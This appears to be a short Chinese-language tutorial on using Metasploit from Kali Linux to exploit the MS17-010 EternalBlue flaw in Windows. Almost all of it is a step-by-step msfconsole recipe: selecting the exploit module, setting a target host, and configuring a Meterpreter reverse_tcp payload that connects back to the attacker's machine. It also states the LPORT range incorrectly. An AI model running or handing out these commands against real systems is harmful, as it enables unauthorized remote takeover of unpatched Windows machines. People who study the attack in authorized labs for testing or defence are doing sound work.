Kali最强渗透工具 — metasploit

打开metasploit工具

msfconsole

msf使用法则:

使用模块——配置模块必选项——运行模块

metasploit攻击windows操作系统:

搜索微软漏洞:

search ms17_010

  1. 使用模块

    use exploit/windows/smb/ms17_010_eternalblue

  2. 设置必选项

    查看必选项【*required为yes的就是必选项】

    show options
    • RHOST:目标地址
    • RPORT:目标端口(445)
    Payload options 攻击载荷
    • LHOST:kali的端口
    • LPORT:0 – 66535
    set RHOSTS 192.168.1.133
    set lport 10001

  3. 运行

    run

metasploit攻击永恒之蓝全流程:

  1. 使用模块

    use exploit/windows/smb/ms17_010_eternalblue

  2. 设置必选项

    • 查看必选项【*required为yes的就是必选项】
    show options
    set RHOSTS 192.168.1.128

    【*RHOSTS为target hosts(s)代表你要攻击谁】

    set payload windows/x64/meterpreter/reverse_tcp

    【*payload是攻击载荷,就是攻击完成后想干啥,这里是想获取meterpreter】

    【*meterpreter是metasploit后渗透的神器】

    set LHOST 192.168.1.136

    【*LHOSTS为listen host代表你是谁,既Kali的IP地址】

    set LPORT 12345

    【*LPORT为listen port,代表你要在kali上开启的端口,1-65535随便选,但不能被占用】

  3. 运行模块,完成攻击

    run